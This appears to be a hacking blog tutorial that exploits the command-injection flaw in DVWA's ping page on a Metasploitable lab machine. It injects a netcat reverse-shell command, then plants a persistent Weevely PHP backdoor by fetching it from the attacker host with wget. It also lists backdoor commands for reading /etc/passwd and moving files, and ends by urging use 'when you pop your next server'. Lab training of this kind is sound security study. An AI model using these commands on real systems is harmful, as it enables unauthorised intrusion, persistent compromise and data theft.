Welcome back my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. Our network is below.
We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.
To start with, change the security settings from high to low on DVWA Security Tab above.
Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.
We will enter an IP address and click on submit.
Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:
nc -vv -l -p 8888 (8888 is the port we want to listen on)
Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.
Connection established, we have full control of the web app.
Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.
First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:
weevely generate 123456 /root/shell.txt. 123456 will be our password which we will use later.
Copy it to:
cp /root/shell.txt /var/www/html so we can see it in our browser.
Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.
Next we start the server on the Kali machine. Start the server:
service apache2 start
On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.
We still have a netcat connection on the server so we can wget our shell.txt file:
wget http://192.168.56.103/shell.txt and the shell.txt should show uploaded
The file has been uploaded, next we need to change it to php extension for it to run.
Mv shell.txt shell.php
Connect to the upload in Kali:
We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.
:help this will give you a list of commands you can run on your back door. Interesting ones are:
Another interesting command we can use is :audit_etcpasswd -vector <option>
To upload a file to the target system:
:file_download rpath is remote path and lpath for local.
So have a play around with Weevely when you pop your next server.
Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.